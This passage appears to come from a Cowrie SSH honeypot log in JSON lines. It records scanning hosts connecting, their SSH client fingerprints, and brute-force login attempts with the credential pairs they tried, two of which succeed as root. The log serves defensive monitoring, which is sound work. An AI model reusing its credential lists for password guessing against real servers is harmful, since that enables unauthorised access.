2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:46:59.937662Z","src_ip":"212.227.125.160","session":"ea4614ea3653"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59008,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d4871f2c421","protocol":"ssh","message":"New connection: 212.227.235.229:59008 (1.2.3.4:22) [session: 9d4871f2c421]","sensor":"my-vps","timestamp":"2025-08-31T05:47:00.155815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:47:00.156700Z","src_ip":"212.227.235.229","session":"9d4871f2c421"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:47:00.430312Z","src_ip":"212.227.235.229","session":"9d4871f2c421"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:47:00.760031Z","src_ip":"43.159.36.188","session":"c6acba9fa2d2"}
{"eventid":"cowrie.login.failed","username":"default","password":"1234","message":"login attempt [default/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:47:00.959046Z","src_ip":"80.94.95.15","session":"ed3c31483bf0"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":42134,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ef6b3fe965e","protocol":"ssh","message":"New connection: 43.159.36.188:42134 (1.2.3.4:22) [session: 7ef6b3fe965e]","sensor":"my-vps","timestamp":"2025-08-31T05:47:01.009525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:47:01.010173Z","src_ip":"43.159.36.188","session":"7ef6b3fe965e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:47:01.261311Z","src_ip":"43.159.36.188","session":"7ef6b3fe965e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:47:01.565551Z","src_ip":"212.227.235.229","session":"9d4871f2c421"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:47:01.838117Z","src_ip":"212.227.235.229","session":"f4959e42deea"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:47:01.841089Z","src_ip":"212.227.235.229","session":"9d4871f2c421"}
{"eventid":"cowrie.login.failed","username":"default","password":"abc123","message":"login attempt [default/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:47:02.011849Z","src_ip":"80.94.95.15","session":"ed3c31483bf0"}
{"eventid":"cowrie.login.failed","username":"test2","password":"123456789","message":"login attempt [test2/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T05:47:02.248073Z","src_ip":"212.227.125.160","session":"ea4614ea3653"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:47:02.307687Z","src_ip":"43.159.36.188","session":"7ef6b3fe965e"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:47:02.559787Z","src_ip":"43.159.36.188","session":"e1cde5308501"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:47:02.560750Z","src_ip":"43.159.36.188","session":"7ef6b3fe965e"}
{"eventid":"cowrie.login.failed","username":"default","password":"abcd123","message":"login attempt [default/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:47:03.065360Z","src_ip":"80.94.95.15","session":"ed3c31483bf0"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:47:03.748217Z","src_ip":"212.227.125.160","session":"ea4614ea3653"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:47:04.118850Z","src_ip":"80.94.95.15","session":"ed3c31483bf0"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:47:10.539924Z","src_ip":"212.227.125.160","session":"be79f790b5c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39544,"dst_ip":"1.2.3.4","dst_port":22,"session":"9aa9a4f4cfea","protocol":"ssh","message":"New connection: 212.227.235.229:39544 (1.2.3.4:22) [session: 9aa9a4f4cfea]","sensor":"my-vps","timestamp":"2025-08-31T05:47:11.052230Z"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":43722,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6eee1ebf172","protocol":"ssh","message":"New connection: 170.64.166.123:43722 (1.2.3.4:22) [session: e6eee1ebf172]","sensor":"my-vps","timestamp":"2025-08-31T05:47:17.152110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:47:17.153018Z","src_ip":"170.64.166.123","session":"e6eee1ebf172"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:47:17.427564Z","src_ip":"170.64.166.123","session":"e6eee1ebf172"}
{"eventid":"cowrie.login.failed","username":"jacob","password":"Asdf@123","message":"login attempt [jacob/Asdf@123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:47:18.569163Z","src_ip":"170.64.166.123","session":"e6eee1ebf172"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:47:19.846244Z","src_ip":"170.64.166.123","session":"e6eee1ebf172"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:47:20.008025Z","src_ip":"212.227.235.229","session":"9aa9a4f4cfea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:47:20.008798Z","src_ip":"212.227.235.229","session":"9aa9a4f4cfea"}
{"eventid":"cowrie.session.closed","duration":"43.9","message":"Connection lost after 43.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:47:20.525526Z","src_ip":"212.227.125.160","session":"be79f790b5c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56888,"dst_ip":"1.2.3.4","dst_port":22,"session":"b412282e3f8c","protocol":"ssh","message":"New connection: 212.227.235.229:56888 (1.2.3.4:22) [session: b412282e3f8c]","sensor":"my-vps","timestamp":"2025-08-31T05:47:36.084211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:47:36.825894Z","src_ip":"212.227.235.229","session":"b412282e3f8c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:47:36.826576Z","src_ip":"212.227.235.229","session":"b412282e3f8c"}
{"eventid":"cowrie.login.failed","username":"test2","password":"password","message":"login attempt [test2/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:47:42.977908Z","src_ip":"212.227.235.229","session":"b412282e3f8c"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:47:44.796479Z","src_ip":"212.227.235.229","session":"b412282e3f8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42244,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a08264fe434","protocol":"ssh","message":"New connection: 212.227.125.160:42244 (1.2.3.4:22) [session: 6a08264fe434]","sensor":"my-vps","timestamp":"2025-08-31T05:47:46.101680Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58318,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0fcf1e8cd75","protocol":"ssh","message":"New connection: 212.227.235.229:58318 (1.2.3.4:22) [session: b0fcf1e8cd75]","sensor":"my-vps","timestamp":"2025-08-31T05:47:56.626970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:47:56.635532Z","src_ip":"212.227.235.229","session":"b0fcf1e8cd75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:47:56.890738Z","src_ip":"212.227.235.229","session":"b0fcf1e8cd75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46866,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cb652d9a7b2","protocol":"ssh","message":"New connection: 212.227.125.160:46866 (1.2.3.4:22) [session: 7cb652d9a7b2]","sensor":"my-vps","timestamp":"2025-08-31T05:47:57.068525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:47:57.462706Z","src_ip":"212.227.125.160","session":"7cb652d9a7b2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:47:57.463424Z","src_ip":"212.227.125.160","session":"7cb652d9a7b2"}
{"eventid":"cowrie.login.failed","username":"test2","password":"password","message":"login attempt [test2/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:47:59.248219Z","src_ip":"212.227.125.160","session":"7cb652d9a7b2"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:00.792092Z","src_ip":"212.227.125.160","session":"7cb652d9a7b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41688,"dst_ip":"1.2.3.4","dst_port":22,"session":"db2ab5e3193e","protocol":"ssh","message":"New connection: 212.227.235.229:41688 (1.2.3.4:22) [session: db2ab5e3193e]","sensor":"my-vps","timestamp":"2025-08-31T05:48:01.814483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:48:01.815427Z","src_ip":"212.227.235.229","session":"db2ab5e3193e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:48:02.101780Z","src_ip":"212.227.235.229","session":"db2ab5e3193e"}
{"eventid":"cowrie.login.failed","username":"jvj","password":"jvj","message":"login attempt [jvj/jvj] failed","sensor":"my-vps","timestamp":"2025-08-31T05:48:03.288557Z","src_ip":"212.227.235.229","session":"db2ab5e3193e"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:04.577318Z","src_ip":"212.227.235.229","session":"db2ab5e3193e"}
{"eventid":"cowrie.session.closed","duration":"23.6","message":"Connection lost after 23.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:09.722885Z","src_ip":"212.227.125.160","session":"6a08264fe434"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":37088,"dst_ip":"1.2.3.4","dst_port":22,"session":"e647da7a2421","protocol":"ssh","message":"New connection: 43.159.36.188:37088 (1.2.3.4:22) [session: e647da7a2421]","sensor":"my-vps","timestamp":"2025-08-31T05:48:10.607100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:48:10.607766Z","src_ip":"43.159.36.188","session":"e647da7a2421"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:48:10.857776Z","src_ip":"43.159.36.188","session":"e647da7a2421"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45892,"dst_ip":"1.2.3.4","dst_port":22,"session":"a69771c584ce","protocol":"ssh","message":"New connection: 212.227.235.229:45892 (1.2.3.4:22) [session: a69771c584ce]","sensor":"my-vps","timestamp":"2025-08-31T05:48:11.187672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:48:11.188639Z","src_ip":"212.227.235.229","session":"a69771c584ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":